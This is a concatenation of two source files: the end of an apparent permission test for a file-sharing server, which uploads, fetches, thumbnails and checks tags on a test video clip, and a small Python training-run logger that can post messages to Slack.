r = requests.post(
ub + d,
data={"act": "bput"},
files={"f": (d.replace("/", "") + ".h264", vid)},
)
c = r.status_code
if c == 200 and p not in ["w", "rw"]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
elif c == 403 and p not in ["r"]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
elif c not in [200, 403]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
cpp.clean()
# GET permission
for d, p in zip(udirs, perms):
u = "{}{}/{}.h264".format(ub, d, d.replace("/", ""))
r = requests.get(u)
ok = bool(r)
if ok != (p in ["rw"]):
raise Exception("get {} with perm {} at {}".format(ok, p, u))
# stat filesystem
for d, p in zip(pdirs, perms):
u = "{}/{}.h264".format(d, d.split("test/")[-1].replace("/", ""))
ok = os.path.exists(u)
if ok != (p in ["rw", "w"]):
raise Exception("stat {} with perm {} at {}".format(ok, p, u))
# GET thumbnail, verify contents
for d, p in zip(udirs, perms):
u = "{}{}/{}.h264?th=j".format(ub, d, d.replace("/", ""))
r = requests.get(u)
ok = bool(r and r.content[:3] == b"\xff\xd8\xff")
if ok != (p in ["rw"]):
raise Exception("thumb {} with perm {} at {}".format(ok, p, u))
# check tags
cpp.await_idle(ub, 5)
for d, p in zip(udirs, perms):
u = "{}{}?ls".format(ub, d)
r = requests.get(u)
j = r.json() if r else False
tag = None
if j:
for f in j["files"]:
tag = tag or f["tags"].get("res")
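# "res" appears to be the resolution tag produced by media scanning; for the
# generated 48x32 test clip it should come back as "48x32" (asserted below)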
r_ok = bool(j)
w_ok = bool(r_ok and j.get("files"))
if not r_ok or w_ok != (p in ["rw"]):
raise Exception("ls {} with perm {} at {}".format(ok, p, u))
if (tag and p != "rw") or (not tag and p == "rw"):
raise Exception("tag {} with perm {} at {}".format(tag, p, u))
if tag is not None and tag != "48x32":
raise Exception("tag [{}] at {}".format(tag, u))
cpp.stop(True)
def run(tc, *a):
try:
tc(*a)
finally:
try:
CPP[0].stop(False)
except:
pass
def main():
run(tc1, "")
run(tc1, ":c,fk")
if __name__ == "__main__":
main()
|
infolog.py
|
import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
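# Minimal usage sketch (hypothetical paths and run names):
#   init('logs/train.log', 'tacotron-1')
#   log('step 100: loss=0.123')
#   log('training finished', slack=True)  # only posts if a slack_url was passed to init()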
|